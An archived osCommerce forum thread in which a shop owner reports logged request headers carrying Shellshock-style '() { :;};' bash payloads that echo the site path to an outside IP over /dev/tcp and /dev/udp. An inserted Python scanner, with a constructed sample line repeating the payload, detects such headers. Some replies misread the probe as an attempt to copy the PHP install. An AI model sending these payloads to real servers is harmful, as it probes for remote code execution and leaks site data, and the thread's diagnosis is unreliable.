
Archived

This topic is now archived and is closed to further replies.

drillsar

What is this person doing?


I installed http error log and noticed a couple of people keep going to find this file:

/images/thumbnails/160/160/product/1/yhst-129599579720997_2272_101803540.jpg

and it doesn't exist? Are they trying to hack or what?


Look at the IP and see where the request is coming from. You could have issues in your code, or there can be bad links that you cannot control. There isn't much to hack with that link...


I have installed supertracker and I find this...

Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"

Referred By: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?

where mysitexxxx = my site

with 3 different ways, maybe an attempt at hacking?

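Added example (not part of the original thread): the `() { :;};` prefix in the logged Customer Browser and Referred By values is a bash function definition placed in HTTP headers, the pattern used to probe CGI environments for the bash environment-variable bug known as Shellshock, and this sketch flags such header values in an access log and lists the `/dev/tcp` and `/dev/udp` destinations they name. The Apache combined log format, the sample lines, `example.test` and the 192.0.2.x / 198.51.100.x / 203.0.113.x addresses are assumptions constructed for the example.

```python
import re

# Apache "combined" log line. Quoted fields may hold backslash-escaped quotes,
# which is how the quoted payload in the thread ends up logged as \" ... \".
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ '
    + QUOTED + ' ' + QUOTED + '$'
)
# Header value that opens with a bash function definition: "() {"
FUNC_PREFIX = re.compile(r'^\s*\(\)\s*\{')
# bash network pseudo-devices named as the destination of a redirect
CALLBACK = re.compile(r'/dev/(tcp|udp)/([\w.-]+)/(\d+)')

# Constructed sample lines (documentation addresses, not taken from the thread).
SAMPLE_LOG = r'''
198.51.100.7 - - [01/Jan/2015:10:01:02 +0000] "GET /images/missing.jpg HTTP/1.1" 404 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [01/Jan/2015:10:05:44 +0000] "GET / HTTP/1.1" 200 900 "() { :;}; /bin/bash -c \"echo example.test/cgi-sys/php5 > /dev/tcp/192.0.2.10/23; echo example.test/cgi-sys/php5 > /dev/udp/192.0.2.10/80\"" "() { :;}; /bin/bash -c \"echo example.test/cgi-sys/php5 > /dev/tcp/192.0.2.10/23\""
'''.strip()


def scan(log_text):
    """Return one finding per header field that starts with '() {'."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE.match(line.strip())
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        client, _request, status, referer, agent = m.groups()
        for field, value in (("referer", referer), ("user-agent", agent)):
            if FUNC_PREFIX.match(value):
                findings.append({
                    "line": lineno,
                    "client": client,
                    "status": status,
                    "field": field,
                    "callbacks": [(proto, host, int(port))
                                  for proto, host, port in CALLBACK.findall(value)],
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A finding shows only that the request was received; whether anything ran depends on whether the headers reached a CGI handler that invokes an unpatched bash.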

@rory1 That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran".

My bet is that it's a hack attempt, or trying to get information for one.

Regards

Jim


See my profile for a list of my addons and ways to get support.


If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that?

You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher.

Regards

Jim



PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version.

Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5.

Regards

Jim



@kymation - good to know about the php 5.5. I have noticed there seems to be an ability to select options json, soap, pdf. Would anyone know of a useful link for what should be turned on? Or even one that talks about security in php 5.5.

-BP


Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc.

PHP 5.5 is still being actively maintained, so I think it is pretty safe.

Regards

Jim



Thank you kymation,

I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc.

As I am looking at around 100+ of such things. I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just an admin interface now for turning on and off items?

This ability wasn't present with the older versions on my host so it got me to wondering if 5.5 has a special focus to ensure better security.

It also got me curious what would be relevant for security or functionality for osCommerce. I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet. Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose.

-BP
